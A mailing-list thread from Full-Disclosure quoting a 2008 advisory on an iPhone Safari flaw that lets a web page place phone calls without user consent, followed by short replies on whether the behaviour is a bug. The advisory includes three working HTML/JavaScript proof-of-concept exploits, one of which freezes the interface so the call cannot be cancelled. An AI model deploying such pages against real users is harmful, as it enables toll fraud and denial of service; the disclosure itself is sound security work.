[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)



Bug or feature (old common argument within the software world) however I
don't think that Automatic dialing is what I want when I am browsing a page.
I would like a choice not for it to be done automatically.

On Thu, Jun 18, 2009 at 8:29 PM, Collin Mulliner <collin@xxxxxxxxxxxxxxx>wrote:

> Mike,
>
> just getting to the phone dialer is not a bug! That is what the tel:
> protocol is for. All most all mobile phones implement this, every time
> you open a tel: URL you will get to the dialer in some way.
>
> Collin
>
> Mike Ely wrote:
> > Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was
> wondering why my phone stepped on email to dial out when I read this email
> and then I read the subject line ;)
> >
> > FWIW, it didn't actually dial, just loaded the dialer with that number
> ready.
> >
> > Looks like this is a Webkit bug, not Safari.
> >
> > Collin Mulliner <collin@xxxxxxxxxxxxxxx> wrote:
> >
> >> Released since Apple published the iPhone 3.0 security fixes.
> >>
> >> Vulnerability Report
> >>
> >> --- BEGIN ADVISORY ---
> >>
> >> Manufacturer: Apple (www.apple.com)
> >> Device:       iPhone 3G (iPhone 1st Gen)
> >> Firmware:     2.1 (possible earlier versions)
> >> Device Type:  smart phone
> >>
> >> Subsystems: Safari (and mobile telephony)
> >>
> >> -----------------------------
> >>
> >> Short name:
> >>   iPhone Safari phone-auto-dial (vulnerability)
> >>
> >> Vulnerability class:
> >>   application logic bug
> >>
> >> Executive Summary:
> >>   A malicious website can initiate a phone call without the need of user
> >>   interaction. The destination phone number is chosen by the attacker.
> >>
> >> Risk: MEDIUM-HIGH
> >>   Medium to high risk due to the possibility of financial gain through
> >>   this attack by calling of premium rate numbers (e.g. 1-900 in the
> >>   U.S.). Denial-of-service against arbitrary phone numbers through
> >>   mass-calling. User cannot prevent attack.
> >>
> >> -----------------------------
> >>
> >> Reporter: Collin Mulliner <collin[AT]mulliner.org>
> >>
> >> -----------------------------
> >>
> >> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
> >>
> >> -----------------------------
> >>
> >> Time line:
> >>
> >>   Oct. 20. 2008: Reported vulnerability to vendor.
> >>   Oct. 20. 2008: Vendor acknowledges receiving our email.
> >>                  Not commenting on the vulnerability itself.
> >>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
> >>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
> >>   Oct. 30. 2008: Sent additional information.
> >>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
> >>                  version.
> >>   Nov. 20. 2008: Public disclosure.
> >>   Jun. 18. 2009: Full-Disclosure.
> >>
> >> -----------------------------
> >>
> >> Fix:
> >>
> >>   iPhone OS 2.2
> >>   iPhone OS 2.2.1
> >>   iPhone OS 3.0
> >>
> >> -----------------------------
> >>
> >> Technical Details:
> >>
> >>   The Safari version running on the iPhone supports handling the TEL [1]
> >>   protocol through launching the telephony/dialer application. This is
> >>   done by passing the provided phone number to the telephony
> >>   application. Under normal conditions, loading a tel: URI results in a
> >>   message box asking the user's permission to call the given number. The
> >>   user is presented with the simple choice to either press call or
> >>   cancel.
> >>
> >>   A TEL URI can be opened automatically if the TEL URI is used as the
> >>   source of an HTML iframe or frame, as the URL of a meta refresh, as
> >>   the location of a HTTP 30X redirect, and as the location of the
> >>   current or a new window using javascript.
> >>
> >>   We discovered a security vulnerability that dismisses the "ask for
> >>   permission to call" dialog in a way that chooses the "call" option
> >>   rather than the "cancel" option.
> >>
> >>   This condition occurs if a TEL URI is activated at the same time
> >>   Safari is closed by launching an external application, for example
> >>   launching the SMS application (in order to handle a SMS URI [2]). The
> >>   SMS application can be launched through placing a SMS URI as the
> >>   source of an iframe. This is shown in the first proof-of-concept
> >>   exploit below.
> >>
> >>   Further investigation showed that this behavior can be reproduced by
> >>   launching other applications such as: Maps, YouTube, and iTunes.
> >>   Launching these applications can be achieved through loading special
> >>   URLs using the meta refresh tag. This is shown in the second
> >>   proof-of-concept exploit below.
> >>
> >>   We also discovered that the bug can also be triggered through popup
> >>   windows (e.g. javascript alert). In this situation the initiating app
> >>   does not need to be termianted in order to active the call.
> >>
> >>   Finally, we discovered a second bug that can be used to perform
> >>   malicious phone calls that cannot be prevented or canceled by the
> >>   victim. This bug allows the attacker to freez the GUI (graphical user
> >>   interface) for a number of seconds. While the GUI is frozen the call
> >>   progresses in      the background and cannot be stopped by the victim
> user.
> >>   Freezing the GUI is achieved by passing a "very long" phone number to
> >>   the SMS application. The SMS application, immediately after being
> >>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
> >>   be performed fast enough in order to prevent the malicious call.
> >>
> >>
> >>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
> >>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
> >>
> >> -----------------------------
> >>
> >> Further Discussion:
> >>
> >>   The dialing dialog is clearly shown to the user also the user, in most
> >>   cases, can't press cancel quick enough in order to stop the initiation
> >>   of the call. Once the external application is launched, the telephony
> >>   application is running in the background performing the call. Only
> >>   the call forwarding dialog (containing the "dismiss" button) indicates
> >>   a call being made.
> >>
> >> -----------------------------
> >>
> >> Proof-of-Concept with plain HTML using the SMS application:
> >>
> >>   <html>
> >>   <head>
> >>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >>   </title>
> >>   </head>
> >>   <body>
> >>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >>   <!-- second iframe is to attack quick users who manage to close the
> >>        first call-dialog //-->
> >>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> >>   </body>
> >>   </html>
> >>
> >> Proof-of-Concept using javascript and the Maps application:
> >>
> >>   <html>
> >>   <head>
> >>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >>   </title>
> >>   <meta http-equiv="refresh" content="0;
> >>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt";>
> >>   </head>
> >>   <body>
> >>   <script lang=javascript>
> >>   function a() {
> >>    document.write("<iframe src=\"tel:+14089748388\" WIDTH=50
> >> HEIGHT=10></iframe>");
> >>   }
> >>   setTimeout("a()", 100);
> >>   </script>
> >>   </body>
> >>   </html>
> >>
> >> Proof-of-Concept attack where the victim user cannot stop the malicious
> >> phone call:
> >>
> >>   <html>
> >>   <head>
> >>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> >>   </title>
> >>   </head>
> >>   <body>
> >>   <script lang=javascript>
> >>   l = "<iframe src=\"sms:";
> >>   for (i = 0; i < 10000; i++) {
> >>           l = l + "3340948034298232";
> >>   }
> >>   l = l + "\" width=10 height=10></iframe><iframe
> >>   src=\"tel:+14089748388\" height=10 width=10></iframe>";
> >>   document.write(l);
> >>   </script>
> >>   </body>
> >>   </html>
> >>
> >> -----------------------------
> >>
> >> More Detailed Information:
> >>
> >>  Demo video available at:
> >>   http://www.mulliner.org/iphone/
> >>
> >>  Advisories:
> >>   http://www.mulliner.org/security/advisories/
> >>
> >> --- END ADVISORY ---
> >>
> >>
> >> --
> >> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> >> info/pgp: finger collin@xxxxxxxxxxxxxxx
> >> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
> >> does!
>
>
> --
> Collin R. Mulliner <collin@xxxxxxxxxxxxxxx>
> info/pgp: finger collin@xxxxxxxxxxxxxxx
> C gives you enough rope to hang yourself. C++ also gives you the tree
> object to tie it to.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com

http://www.jewelerslounge.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/